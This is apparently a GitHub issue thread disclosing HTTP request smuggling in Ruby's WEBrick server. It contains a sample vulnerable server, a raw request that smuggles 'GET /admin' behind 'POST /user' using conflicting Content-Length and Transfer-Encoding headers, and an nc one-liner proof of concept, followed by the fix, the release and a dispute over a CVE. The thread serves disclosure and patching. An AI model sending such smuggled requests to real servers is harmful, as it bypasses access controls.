HTTP Request Smuggling in ruby webrick

[JulianWu520]

The vulnerability happens because the server doesn't correctly handle requests with both Content-Length and Transfer-Encoding headers. This allows an attacker to sneak in an extra request (e.g., GET /admin) after the normal request (POST /user). As a result, unauthorized users can access restricted areas like /admin by POST /user.

The following Ruby WEBrick sample server was used to process HTTP requests:

require 'webrick'

server = WEBrick::HTTPServer.new(
  Port: 8000,
  DocumentRoot: Dir.pwd
)

server.mount_proc '/admin' do |req, res|
  res.body = "This is the admin area. Only authorized users should see this.\n"
end

server.mount_proc '/user' do |req, res|
  res.body = "This is the user area. Welcome!\n"
end

trap('INT') { server.shutdown }
server.start

hacker request

POST /user HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 50
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: 127.0.0.1:8000

server response

Console log

julianwu@RLab:~/Work/ruby/webrick$ ruby test.rb
[2024-09-16 00:20:45] INFO  WEBrick 1.8.1
[2024-09-16 00:20:45] INFO  ruby 3.0.2 (2021-07-07) [x86_64-linux-gnu]
[2024-09-16 00:20:45] INFO  WEBrick::HTTPServer#start: pid=209120 port=8000
127.0.0.1 - - [16/Sep/2024:00:20:46 CST] "POST /user HTTP/1.1" 200 32
- -> /user
127.0.0.1 - - [16/Sep/2024:00:20:46 CST] "GET /admin HTTP/1.1" 200 63
- -> /admin

[jeremyevans]

I checked and RFC 7230 allows the server to return an error in this case. I've submitted pull request #146 to fix it, can you test it and see if it works in your example?

[JulianWu520]

Hi jeremyevans,

I have checked the patch you pushed, the issue is still unresolved, please check by the command below.

 (printf 'POST /user HTTP/1.1\r\nHost: 127.0.0.1:8000\r\nTransfer-Encoding: chunked\r\nContent-Length: 50\r\n\r\n0\r\n\r\nGET /admin HTTP/1.1\r\nHost: 127.0.0.1:8000\r\n\r\n'; cat) | nc 127.0.0.1 8000

[jeremyevans]

I guess you aren't using pull request #146. With pull request #146:

Webrick output:

[2024-09-18 19:57:46] INFO  WEBrick 1.8.1
[2024-09-18 19:57:46] INFO  ruby 3.3.5 (2024-09-03) [x86_64-openbsd]
[2024-09-18 19:57:46] INFO  WEBrick::HTTPServer#start: pid=62758 port=8000
[2024-09-18 19:57:59] ERROR HTTPRequest#fixup: WEBrick::HTTPStatus::BadRequest occurred.
127.0.0.1 - - [18/Sep/2024:19:57:59 PDT] "POST /user HTTP/1.1" 200 32
- -> /user

nc output:

HTTP/1.1 200 OK
Server: WEBrick/1.8.1 (Ruby/3.3.5/2024-09-03)
Date: Thu, 19 Sep 2024 02:57:59 GMT
Content-Length: 32
Connection: Keep-Alive

This is the user area. Welcome!

I am able to recreate the problem without pull request #146, though.

[JulianWu520]

Hi jeremyevans,

Sorry, I forgot to check the required lib from the local file. I confirmed that the malicious request is not wokring for this case.

Additionally, could you please assist me in applying for a CVE ID for this vulnerability, and have my name mentioned in the acknowledgments on the Ruby official security page? I would appreciate if you can help me.

[jeremyevans]

Webrick has not been part of Ruby since the release of Ruby 3.0, over three years ago. While this repository is under the ruby organization on GitHub, it is no longer considered part of Ruby.

Webrick should not be used in production. It is only still maintained because there are other gems relying it, most of which do so only for testing, and only because it is a pure ruby implementation and it was shipped with Ruby in the past.

I'm sorry, but I cannot assist with applying for a CVE, and as Webrick is only longer part of Ruby, an acknowledgment on Ruby's official security page would not be appropriate.

[vietqhoang]

The issue and the fix are much appreciated. What is the project's release practice for new changes?

[jeremyevans]

@hsbt, is it possible to release a new version with this security fix?

[hsbt]

Done https://github.com/ruby/webrick/releases/tag/v1.8.2

Someone requests to assign https://nvd.nist.gov/vuln/detail/CVE-2024-47220 from MITRE. It's disrupted our ecosystem and waste our valuable time.

[JulianWu520]

Hi hsbt,

I requested to assign https://nvd.nist.gov/vuln/detail/CVE-2024-47220 from MITRE, since jeremyevans said it won't be applied for a CVE for me and your team has committed patch for http smuggling, please let me know if there are any problems for the process.

[hsbt]

I requested rejecting CVE-2024-47220 to MITRE now.

Don't request CVE id without maintainer's confirmation. webrick is not for production, it means we will not handle issue as vulnerability over the simple bug.

A lot of people's time is spent by your actions. see above reverse links.

[Alainx277]

Why should this request smuggling vulnerability not be a valid CVE entry?

As an example: CVE-2020-25613 is a similar vulnerability in WEBrick and also got a Ruby news entry.

[hsbt]

We changed the maintenance policy at d91c985 and after that announce.